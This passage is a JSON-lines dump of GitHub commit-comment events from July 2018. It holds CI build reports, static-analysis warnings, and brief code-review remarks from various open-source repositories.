href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea01bd1a3400186cdeb0ba889997862a80b2e08f-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-12T01:29:23Z"}
{"id":"7953429984","type":"CommitCommentEvent","actor":{"login":"myCloudCode"},"repo":{"name":"snnugiser/CodeReview"},"payload":{"comment":{"id":29679040,"position":17,"line":17,"path":"XYZ2BLH.cs","commit_id":"35c7c454be48c8d74aa66e58ba96577e6fc226a8","created_at":"2018-07-12T01:29:32Z","updated_at":"2018-07-12T01:29:32Z","author_association":"NONE","body":"过于复杂的三元运算符组合，建议改成if语句"}},"created_at":"2018-07-12T01:29:32Z"}
{"id":"7953430445","type":"CommitCommentEvent","actor":{"login":"ItsASine"},"repo":{"name":"ItsASine/resources"},"payload":{"comment":{"id":29679041,"position":null,"line":null,"path":null,"commit_id":"c1dcb922ee618b61d33921349215ca2d55b4e766","created_at":"2018-07-12T01:29:44Z","updated_at":"2018-07-12T01:29:44Z","author_association":"OWNER","body":"They can and this is perfect 🎉 "}},"created_at":"2018-07-12T01:29:44Z"}
{"id":"7953431044","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29679043,"position":16,"line":1219,"path":"pom.xml","commit_id":"5378c5343ceb9f3305e947d0c46410cdc1bbc673","created_at":"2018-07-12T01:29:58Z","updated_at":"2018-07-12T01:29:58Z","author_association":"CONTRIBUTOR","body":"Much better +1"}},"created_at":"2018-07-12T01:29:58Z"}
{"id":"7953432944","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29679051,"position":null,"line":null,"path":null,"commit_id":"ea01bd1a3400186cdeb0ba889997862a80b2e08f","created_at":"2018-07-12T01:30:42Z","updated_at":"2018-07-12T01:30:42Z","author_association":"NONE","body":"157485520-FisherPedersenConvectEqRefTempBug (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea01bd1a3400186cdeb0ba889997862a80b2e08f-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-12T01:30:42Z"}
{"id":"7953433249","type":"CommitCommentEvent","actor":{"login":"ripplelabs-jenkins"},"repo":{"name":"scottschurr/rippled"},"payload":{"comment":{"id":29679052,"position":null,"line":null,"path":null,"commit_id":"d727e30680e69b209f9261b82a0685608049aab7","created_at":"2018-07-12T01:30:49Z","updated_at":"2018-07-12T01:30:49Z","author_association":"COLLABORATOR","body":"\n## Jenkins Build Summary\n\nBuilt from [this commit](https://github.com/scottschurr/rippled/commit/d727e30680e69b209f9261b82a0685608049aab7)\n\nBuilt at __20180712 - 01:30:49__\n\n### Test Results\n\nBuild Type | Log | Result | Status\n---------- | --- | ------ | ------\nmsvc.debug | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/6//artifact/msvc.debug.txt) | 1032 cases, 0 failed, t: 565s | PASS :white_check_mark: \ncoverage | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/6//artifact/coverage.txt) | 1035 cases, 0 failed, t: 692s | PASS :white_check_mark: \ndocs | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/6//artifact/docs.txt) | 1 cases, 0 failed, t: 2s | PASS :white_check_mark: \ngcc.release.unity <br/>-Dassert=true, <br/>MANUAL_TESTS=true | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/6//artifact/gcc.release.unity_Dassert_true_MANUAL_TESTS_true.txt) | 1101 cases, 1 failed, t: 798s | FAIL :red_circle: \nclang.debug.unity | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/6//artifact/clang.debug.unity.txt) | 1035 cases, 0 failed, t: 254s | PASS :white_check_mark: \nrpm | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/6//artifact/rpm.txt) | 1034 cases, 0 failed, t: n/a | PASS :white_check_mark: \nclang.debug.unity, <br/>PARALLEL_TESTS=false | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/6//artifact/clang.debug.unity_PARALLEL_TESTS_false.txt) | 1035 cases, 0 failed, t: 496s | PASS :white_check_mark: \nclang.debug.nounity | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/6//artifact/clang.debug.nounity.txt) | 1033 cases, 0 failed, t: 396s | PASS :white_check_mark: \ngcc.debug.unity | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/6//artifact/gcc.debug.unity.txt) | 1035 cases, 0 failed, t: 252s | PASS :white_check_mark: \ngcc.debug.nounity | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/6//artifact/gcc.debug.nounity.txt) | 1033 cases, 0 failed, t: 332s | PASS :white_check_mark: \nmsvc.debug, <br/>PROJECT_NAME=rippled_classic | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/6//artifact/msvc.debug_PROJECT_NAME_rippled_classic.txt) | 1032 cases, 0 failed, t: 1235s | PASS :white_check_mark: \nclang.release.unity <br/>-Dassert=true | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/6//artifact/clang.release.unity_Dassert_true.txt) | 1034 cases, 0 failed, t: 342s | PASS :white_check_mark: \ngcc.release.unity <br/>-Dassert=true | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/6//artifact/gcc.release.unity_Dassert_true.txt) | 1034 cases, 0 failed, t: 358s | PASS :white_check_mark: \ngcc.debug.unity <br/>-Dstatic=true | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/6//artifact/gcc.debug.unity_Dstatic_true.txt) | 1035 cases, 0 failed, t: 251s | PASS :white_check_mark: \nmsvc.release | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/6//artifact/msvc.release.txt) | 1031 cases, 0 failed, t: 519s | PASS :white_check_mark: \n\n"}},"created_at":"2018-07-12T01:30:49Z"}
{"id":"7953434219","type":"CommitCommentEvent","actor":{"login":"dunjeon"},"repo":{"name":"dunjeon/azerothcore-wotlk"},"payload":{"comment":{"id":29679054,"position":null,"line":null,"path":null,"commit_id":"d26a6943f7a10e1ea90d38a3b11e8ab0d7981657","created_at":"2018-07-12T01:31:14Z","updated_at":"2018-07-12T01:31:14Z","author_association":"OWNER","body":"#     TimeIsTimePlus\r\n#     \tAdjust the number of game days per real day by adjusting the Realm Timer\r\n#     \tDefault : 1.0 (Blizzlike)\r\n#     \tExample : 60 is 1 second (Real Time) = 1 minute (Realm Timer)\r\n#                 60.0  = 1 Game Day every 24   minutes\r\n#                 30.0  = 1 Game Day every 48   minutes         \r\n#                 15.0  = 1 Game Day every 96   minutes or 1.6  Hours\r\n#                 7.5   = 1 Game Day every 192  minutes or 3.2  Hours\r\n#                 3.75  = 1 Game Day every 384  minutes or 6.4  Hours        \r\n#                 1.875 = 1 Game Day every 768  minutes or 12.8 Hours\r\n#                 1.0     = 1 Game Day every 1440 minutes or 24.0 Hours        \r\n\r\nTimeIsTimePlus = 1.0"}},"created_at":"2018-07-12T01:31:14Z"}
{"id":"7953435662","type":"CommitCommentEvent","actor":{"login":"thomasst"},"repo":{"name":"closeio/flask-restutils"},"payload":{"comment":{"id":29679061,"position":null,"line":null,"path":null,"commit_id":"71229dd05a2c20a7ec0e5d1532d254b5aef53eed","created_at":"2018-07-12T01:31:50Z","updated_at":"2018-07-12T01:31:50Z","author_association":"MEMBER","body":"No need for merge commit, could have squashed."}},"created_at":"2018-07-12T01:31:50Z"}
{"id":"7953440891","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29679068,"position":182,"line":null,"path":"app/src/at-thanhhoang/java/asiantech/internship/summer/storage/InternalExternalActivity.java","commit_id":"af159ce7e4eb533699f11bc5c5919033d5fcbae6","created_at":"2018-07-12T01:33:57Z","updated_at":"2018-07-12T01:33:57Z","author_association":"NONE","body":"ERROR: [I18N][DM_DEFAULT_ENCODING] Found reliance on default encoding in asiantech.internship.summer.storage.InternalExternalActivity.readExternalFile(): new java.io.InputStreamReader(InputStream)\nhttp://findbugs.sourceforge.net/bugDescriptions.html#DM_DEFAULT_ENCODING"}},"created_at":"2018-07-12T01:33:57Z"}
{"id":"7953440901","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29679069,"position":129,"line":null,"path":"app/src/at-thanhhoang/java/asiantech/internship/summer/storage/InternalExternalActivity.java","commit_id":"af159ce7e4eb533699f11bc5c5919033d5fcbae6","created_at":"2018-07-12T01:33:57Z","updated_at":"2018-07-12T01:33:57Z","author_association":"NONE","body":"ERROR: [I18N][DM_DEFAULT_ENCODING] Found reliance on default encoding in asiantech.internship.summer.storage.InternalExternalActivity.readInternalFile(): new java.io.InputStreamReader(InputStream)\nhttp://findbugs.sourceforge.net/bugDescriptions.html#DM_DEFAULT_ENCODING"}},"created_at":"2018-07-12T01:33:57Z"}
{"id":"7953440907","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29679070,"position":154,"line":null,"path":"app/src/at-thanhhoang/java/asiantech/internship/summer/storage/InternalExternalActivity.java","commit_id":"af159ce7e4eb533699f11bc5c5919033d5fcbae6","created_at":"2018-07-12T01:33:57Z","updated_at":"2018-07-12T01:33:57Z","author_association":"NONE","body":"ERROR: [I18N][DM_DEFAULT_ENCODING] Found reliance on default encoding in asiantech.internship.summer.storage.InternalExternalActivity.saveExternalFile(): new java.io.FileWriter(File, boolean)\nhttp://findbugs.sourceforge.net/bugDescriptions.html#DM_DEFAULT_ENCODING"}},"created_at":"2018-07-12T01:33:57Z"}
{"id":"7953440920","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29679071,"position":166,"line":null,"path":"app/src/at-thanhhoang/java/asiantech/internship/summer/storage/InternalExternalActivity.java","commit_id":"af159ce7e4eb533699f11bc5c5919033d5fcbae6","created_at":"2018-07-12T01:33:57Z","updated_at":"2018-07-12T01:33:57Z","author_association":"NONE","body":"ERROR: [I18N][DM_DEFAULT_ENCODING] Found reliance on default encoding in asiantech.internship.summer.storage.InternalExternalActivity.saveExternalFile(): String.getBytes()\nhttp://findbugs.sourceforge.net/bugDescriptions.html#DM_DEFAULT_ENCODING"}},"created_at":"2018-07-12T01:33:57Z"}
{"id":"7953440928","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29679072,"position":104,"line":null,"path":"app/src/at-thanhhoang/java/asiantech/internship/summer/storage/InternalExternalActivity.java","commit_id":"af159ce7e4eb533699f11bc5c5919033d5fcbae6","created_at":"2018-07-12T01:33:57Z","updated_at":"2018-07-12T01:33:57Z","author_association":"NONE","body":"ERROR: [I18N][DM_DEFAULT_ENCODING] Found reliance on default encoding in asiantech.internship.summer.storage.InternalExternalActivity.saveInternalFile(): new java.io.FileWriter(File, boolean)\nhttp://findbugs.sourceforge.net/bugDescriptions.html#DM_DEFAULT_ENCODING"}},"created_at":"2018-07-12T01:33:57Z"}
{"id":"7953440940","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29679073,"position":117,"line":null,"path":"app/src/at-thanhhoang/java/asiantech/internship/summer/storage/InternalExternalActivity.java","commit_id":"af159ce7e4eb533699f11bc5c5919033d5fcbae6","created_at":"2018-07-12T01:33:58Z","updated_at":"2018-07-12T01:33:58Z","author_association":"NONE","body":"ERROR: [I18N][DM_DEFAULT_ENCODING] Found reliance on default encoding in asiantech.internship.summer.storage.InternalExternalActivity.saveInternalFile(): String.getBytes()\nhttp://findbugs.sourceforge.net/bugDescriptions.html#DM_DEFAULT_ENCODING"}},"created_at":"2018-07-12T01:33:58Z"}
{"id":"7953441011","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29679074,"position":110,"line":null,"path":"app/src/at-thanhhoang/java/asiantech/internship/summer/storage/InternalExternalActivity.java","commit_id":"af159ce7e4eb533699f11bc5c5919033d5fcbae6","created_at":"2018-07-12T01:33:59Z","updated_at":"2018-07-12T01:33:59Z","author_association":"NONE","body":"WARNING: [AvoidPrintStackTrace] Avoid printStackTrace(); use a logger call instead.\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/logging-java.html#AvoidPrintStackTrace"}},"created_at":"2018-07-12T01:33:59Z"}
{"id":"7953441019","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29679075,"position":120,"line":null,"path":"app/src/at-thanhhoang/java/asiantech/internship/summer/storage/InternalExternalActivity.java","commit_id":"af159ce7e4eb533699f11bc5c5919033d5fcbae6","created_at":"2018-07-12T01:33:59Z","updated_at":"2018-07-12T01:33:59Z","author_association":"NONE","body":"WARNING: [AvoidPrintStackTrace] Avoid printStackTrace(); use a logger call instead.\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/logging-java.html#AvoidPrintStackTrace"}},"created_at":"2018-07-12T01:33:59Z"}
{"id":"7953441028","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29679076,"position":137,"line":null,"path":"app/src/at-thanhhoang/java/asiantech/internship/summer/storage/InternalExternalActivity.java","commit_id":"af159ce7e4eb533699f11bc5c5919033d5fcbae6","created_at":"2018-07-12T01:33:59Z","updated_at":"2018-07-12T01:33:59Z","author_association":"NONE","body":"WARNING: [AvoidPrintStackTrace] Avoid printStackTrace(); use a logger call instead.\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/logging-java.html#AvoidPrintStackTrace"}},"created_at":"2018-07-12T01:33:59Z"}
{"id":"7953441039","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29679077,"position":159,"line":null,"path":"app/src/at-thanhhoang/java/asiantech/internship/summer/storage/InternalExternalActivity.java","commit_id":"af159ce7e4eb533699f11bc5c5919033d5fcbae6","created_at":"2018-07-12T01:34:00Z","updated_at":"2018-07-12T01:34:00Z","author_association":"NONE","body":"WARNING: [AvoidPrintStackTrace] Avoid printStackTrace(); use a logger call instead.\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/logging-java.html#AvoidPrintStackTrace"}},"created_at":"2018-07-12T01:34:00Z"}
{"id":"7953441043","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29679078,"position":169,"line":null,"path":"app/src/at-thanhhoang/java/asiantech/internship/summer/storage/InternalExternalActivity.java","commit_id":"af159ce7e4eb533699f11bc5c5919033d5fcbae6","created_at":"2018-07-12T01:34:00Z","updated_at":"2018-07-12T01:34:00Z","author_association":"NONE","body":"WARNING: [AvoidPrintStackTrace] Avoid printStackTrace(); use a logger call instead.\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/logging-java.html#AvoidPrintStackTrace"}},"created_at":"2018-07-12T01:34:00Z"}
{"id":"7953441048","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29679079,"position":191,"line":null,"path":"app/src/at-thanhhoang/java/asiantech/internship/summer/storage/InternalExternalActivity.java","commit_id":"af159ce7e4eb533699f11bc5c5919033d5fcbae6","created_at":"2018-07-12T01:34:00Z","updated_at":"2018-07-12T01:34:00Z","author_association":"NONE","body":"WARNING: [AvoidPrintStackTrace] Avoid printStackTrace(); use a logger call instead.\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/logging-java.html#AvoidPrintStackTrace"}},"created_at":"2018-07-12T01:34:00Z"}
{"id":"7953445187","type":"CommitCommentEvent","actor":{"login":"johsire"},"repo":{"name":"johsire/simple-react-crud-app"},"payload":{"comment":{"id":29679087,"position":null,"line":null,"path":null,"commit_id":"9f9f3b01edc6646b2455dd9fb5664dba9906ac86","created_at":"2018-07-12T01:35:36Z","updated_at":"2018-07-12T01:35:36Z","author_association":"OWNER","body":"This is the REMOVE function / Not Edit function"}},"created_at":"2018-07-12T01:35:36Z"}
{"id":"7953445558","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29679088,"position":null,"line":null,"path":null,"commit_id":"bae9bc2e841a059e7306d3ca368db3256943461c","created_at":"2018-07-12T01:35:46Z","updated_at":"2018-07-12T01:35:46Z","author_association":"NONE","body":"expanded-runperiod (jasondegraw) - i386-Windows-7-VisualStudio-14: OK (2926 of 2926 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bae9bc2e841a059e7306d3ca368db3256943461c-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bae9bc2e841a059e7306d3ca368db3256943461c-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-12T01:35:46Z"}
{"id":"7953454265","type":"CommitCommentEvent","actor":{"login":"Vierwood"},"repo":{"name":"Altemio/SevenKingdoms-master"},"payload":{"comment":{"id":29679102,"position":null,"line":null,"path":null,"commit_id":"56e4a334505e2c3762ecadf2885f6d30b6376193","created_at":"2018-07-12T01:39:24Z","updated_at":"2018-07-12T01:39:24Z","author_association":"COLLABORATOR","body":"Yeah "}},"created_at":"2018-07-12T01:39:24Z"}
{"id":"7953455127","type":"CommitCommentEvent","actor":{"login":"lisaychuang"},"repo":{"name":"lisaychuang/JavaScript30"},"payload":{"comment":{"id":29679105,"position":null,"line":null,"path":null,"commit_id":"ebb2166ca4da64a3e176d5d9b90e7ce2401fba87","created_at":"2018-07-12T01:39:46Z","updated_at":"2018-07-12T01:39:46Z","author_association":"OWNER","body":"Note is actually for project 26, not 28."}},"created_at":"2018-07-12T01:39:46Z"}
{"id":"7953459208","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29679112,"position":null,"line":null,"path":null,"commit_id":"8ed61c9b0f95f2731475a19739f8234034cb20f2","created_at":"2018-07-12T01:41:22Z","updated_at":"2018-07-12T01:41:22Z","author_association":"NONE","body":"https://www.mewbuilds.com/build/8ed61c9b0f95f2731475a19739f8234034cb20f2"}},"created_at":"2018-07-12T01:41:22Z"}
{"id":"7953465357","type":"CommitCommentEvent","actor":{"login":"kriti21"},"repo":{"name":"kriti21/coala-bears"},"payload":{"comment":{"id":29679120,"position":71,"line":71,"path":"bears/vcs/git/CISkipInspectBear.py","commit_id":"9f3d8c0599edfc3c9fbb63ebf5b85c94abd34c79","created_at":"2018-07-12T01:43:51Z","updated_at":"2018-07-12T01:43:51Z","author_association":"OWNER","body":"If I remove this `return` the error message above would be returned as many times as the no. of CI Engines used. @refeed "}},"created_at":"2018-07-12T01:43:51Z"}
{"id":"7953470794","type":"CommitCommentEvent","actor":{"login":"omjsr"},"repo":{"name":"jenkinsci/job-dsl-plugin"},"payload":{"comment":{"id":29679139,"position":12,"line":87,"path":"docs/Folder-Reference.md","commit_id":"07eace670edc9887e69a95aa01d727a0dc522a1f","created_at":"2018-07-12T01:46:02Z","updated_at":"2018-07-12T01:46:02Z","author_association":"NONE","body":"All view can be removed if user has created another view and selects newly created view as default."}},"created_at":"2018-07-12T01:46:02Z"}
{"id":"7953471873","type":"CommitCommentEvent","actor":{"login":"UC-KyeungseokKang"},"repo":{"name":"UC-KyeungseokKang/ML_for_basic"},"payload":{"comment":{"id":29679140,"position":32,"line":32,"path":"Fancy_softmax_classification.py","commit_id":"f7c149ce56c7c708a7c0f88aab8e88f83c1e3c23","created_at":"2018-07-12T01:46:28Z","updated_at":"2018-07-12T01:46:28Z","author_association":"OWNER","body":"#ㅁㅁㅁ"}},"created_at":"2018-07-12T01:46:28Z"}
{"id":"7953472971","type":"CommitCommentEvent","actor":{"login":"omjsr"},"repo":{"name":"jenkinsci/job-dsl-plugin"},"payload":{"comment":{"id":29679141,"position":12,"line":87,"path":"docs/Folder-Reference.md","commit_id":"07eace670edc9887e69a95aa01d727a0dc522a1f","created_at":"2018-07-12T01:46:55Z","updated_at":"2018-07-12T01:46:55Z","author_association":"NONE","body":"it should consume default view selected under Jenkins configuration"}},"created_at":"2018-07-12T01:46:55Z"}
{"id":"7953473745","type":"CommitCommentEvent","actor":{"login":"guolinke"},"repo":{"name":"Microsoft/LightGBM"},"payload":{"comment":{"id":29679144,"position":19,"line":223,"path":"src/io/config.cpp","commit_id":"1e53445e85fe7d9597a274e4ddc1b1af190d0a64","created_at":"2018-07-12T01:47:14Z","updated_at":"2018-07-12T01:47:14Z","author_association":"MEMBER","body":"oh, you are right."}},"created_at":"2018-07-12T01:47:14Z"}
{"id":"7953475018","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/coala-bears"},"payload":{"comment":{"id":29679149,"position":71,"line":71,"path":"bears/vcs/git/CISkipInspectBear.py","commit_id":"9f3d8c0599edfc3c9fbb63ebf5b85c94abd34c79","created_at":"2018-07-12T01:47:45Z","updated_at":"2018-07-12T01:47:45Z","author_association":"NONE","body":"Ah, ok, keep it there then :)"}},"created_at":"2018-07-12T01:47:45Z"}
{"id":"7953475234","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/coala-bears"},"payload":{"comment":{"id":29679151,"position":48,"line":48,"path":"bears/vcs/git/CISkipInspectBear.py","commit_id":"9f3d8c0599edfc3c9fbb63ebf5b85c94abd34c79","created_at":"2018-07-12T01:47:51Z","updated_at":"2018-07-12T01:47:51Z","author_association":"NONE","body":"Also add an explanation here as a code comment that explains why matching for Appveyor CI is different"}},"created_at":"2018-07-12T01:47:51Z"}
{"id":"7953476160","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/coala-bears"},"payload":{"comment":{"id":29679153,"position":47,"line":47,"path":"bears/vcs/git/CISkipInspectBear.py","commit_id":"9f3d8c0599edfc3c9fbb63ebf5b85c94abd34c79","created_at":"2018-07-12T01:48:11Z","updated_at":"2018-07-12T01:48:11Z","author_association":"NONE","body":"\r\n\r\nAlso add an explanation here as a code comment that explains why matching for Appveyor CI is different\r\n"}},"created_at":"2018-07-12T01:48:11Z"}
{"id":"7953479697","type":"CommitCommentEvent","actor":{"login":"huanghongxun"},"repo":{"name":"huanghongxun/JFoenix"},"payload":{"comment":{"id":29679158,"position":null,"line":null,"path":null,"commit_id":"d474f77b3262add88050ecd4a35b60f9221822fb","created_at":"2018-07-12T01:49:34Z","updated_at":"2018-07-12T01:49:34Z","author_association":"OWNER","body":"just typo..."}},"created_at":"2018-07-12T01:49:34Z"}
{"id":"7953480144","type":"CommitCommentEvent","actor":{"login":"SilverRainZ"},"repo":{"name":"archlinuxcn/repo"},"payload":{"comment":{"id":29679159,"position":18,"line":18,"path":"oni-bin/lilac.py","commit_id":"bff35646608398de5a629fa8dc2362bb63a61272","created_at":"2018-07-12T01:49:46Z","updated_at":"2018-07-12T01:49:46Z","author_association":"MEMBER","body":"这少了对括号？"}},"created_at":"2018-07-12T01:49:46Z"}
{"id":"7953480734","type":"CommitCommentEvent","actor":{"login":"tannerflick4"},"repo":{"name":"Altemio/SevenKingdoms-master"},"payload":{"comment":{"id":29679161,"position":null,"line":null,"path":null,"commit_id":"56e4a334505e2c3762ecadf2885f6d30b6376193","created_at":"2018-07-12T01:50:00Z","updated_at":"2018-07-12T01:50:00Z","author_association":"COLLABORATOR","body":"Crashed on me too."}},"created_at":"2018-07-12T01:50:00Z"}
{"id":"7953481038","type":"CommitCommentEvent","actor":{"login":"johnhawkinson"},"repo":{"name":"freelawproject/courtlistener"},"payload":{"comment":{"id":29679162,"position":null,"line":null,"path":null,"commit_id":"58bd4b566c81063f3d7e7ba49728cf262491183c","created_at":"2018-07-12T01:50:07Z","updated_at":"2018-07-12T01:50:07Z","author_association":"CONTRIBUTOR","body":"At this point it shouldn't matter much, but it seems to me we shouldn't need to be adding new courts to a whitelist. Feature tests for the win! And as long as theyr'e under uscourts.gov, bring 'em on!\r\n\r\n(Of course, then you'll get things like the [Standing Committee's list of rule suggestions docket](http://www.uscourts.gov/rules-policies/records-and-archives-rules-committees/rules-suggestions), but where's the fun in excluding that?)"}},"created_at":"2018-07-12T01:50:07Z"}
{"id":"7953482459","type":"CommitCommentEvent","actor":{"login":"jpshelley"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29679163,"position":null,"line":null,"path":null,"commit_id":"2d9e2f30e17b8e79f2c44ef533ecdd550671304c","created_at":"2018-07-12T01:50:39Z","updated_at":"2018-07-12T01:50:39Z","author_association":"CONTRIBUTOR","body":"@janicduplessis Yeah I should be able to try it out this Friday! So you're suggesting your re-write will fix my original issue and thus making my changes redundant? Just want to be clear."}},"created_at":"2018-07-12T01:50:39Z"}
{"id":"7953485693","type":"CommitCommentEvent","actor":{"login":"shanutheflash"},"repo":{"name":"shanutheflash/tgbot"},"payload":{"comment":{"id":29679172,"position":null,"line":null,"path":null,"commit_id":"3d647e00d7749e21b12ebcbdb31596a31c541e60","created_at":"2018-07-12T01:51:56Z","updated_at":"2018-07-12T01:51:56Z","author_association":"OWNER","body":"@krypticallusion K 😅, don't have server to cherrypick or something, sorry."}},"created_at":"2018-07-12T01:51:56Z"}
{"id":"7953486704","type":"CommitCommentEvent","actor":{"login":"remilia15"},"repo":{"name":"remilia15/android_hardware_sprd"},"payload":{"comment":{"id":29679174,"position":null,"line":null,"path":null,"commit_id":"847a5b79629c0d36076cc0f8a953cd0a495a4167","created_at":"2018-07-12T01:52:19Z","updated_at":"2018-07-12T01:52:19Z","author_association":"OWNER","body":"Done that already\r\nhttps://github.com/remilia15/android_vendor_samsung_scx30g-common/commit/5b917960115213632fb9671e636ee5cace535061"}},"created_at":"2018-07-12T01:52:19Z"}
{"id":"7953487746","type":"CommitCommentEvent","actor":{"login":"shellscape"},"repo":{"name":"parcel-bundler/parcel"},"payload":{"comment":{"id":29679177,"position":4,"line":54,"path":"package.json","commit_id":"c96612087e4dc6576b2cc5367ff0e66219f7147a","created_at":"2018-07-12T01:52:43Z","updated_at":"2018-07-12T01:52:43Z","author_association":"NONE","body":"great choice of package 👍 "}},"created_at":"2018-07-12T01:52:43Z"}
{"id":"7953491899","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29679185,"position":null,"line":null,"path":null,"commit_id":"47881ab5459b824f53f6a6f90cef7346591de7a8","created_at":"2018-07-12T01:54:21Z","updated_at":"2018-07-12T01:54:21Z","author_association":"NONE","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-MacOS-10.9-clang: OK (3309 of 3309 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-47881ab5459b824f53f6a6f90cef7346591de7a8-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-47881ab5459b824f53f6a6f90cef7346591de7a8-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-12T01:54:21Z"}
{"id":"7953492270","type":"CommitCommentEvent","actor":{"login":"myronliu347"},"repo":{"name":"museui/muse-ui"},"payload":{"comment":{"id":29679186,"position":null,"line":null,"path":null,"commit_id":"b7c299bb22444592eee39c9460d86f9b80b45bbc","created_at":"2018-07-12T01:54:31Z","updated_at":"2018-07-12T01:54:31Z","author_association":"MEMBER","body":"#1056 "}},"created_at":"2018-07-12T01:54:31Z"}
{"id":"7953501216","type":"CommitCommentEvent","actor":{"login":"mpatel-402455"},"repo":{"name":"mpatel-402455/Scripts"},"payload":{"comment":{"id":29679203,"position":null,"line":null,"path":null,"commit_id":"59bf985da47ead73c39b82ba26e97210e4830836","created_at":"2018-07-12T01:57:57Z","updated_at":"2018-07-12T01:57:57Z","author_association":"OWNER","body":"Linux VMware tools Install shell Script"}},"created_at":"2018-07-12T01:57:57Z"}
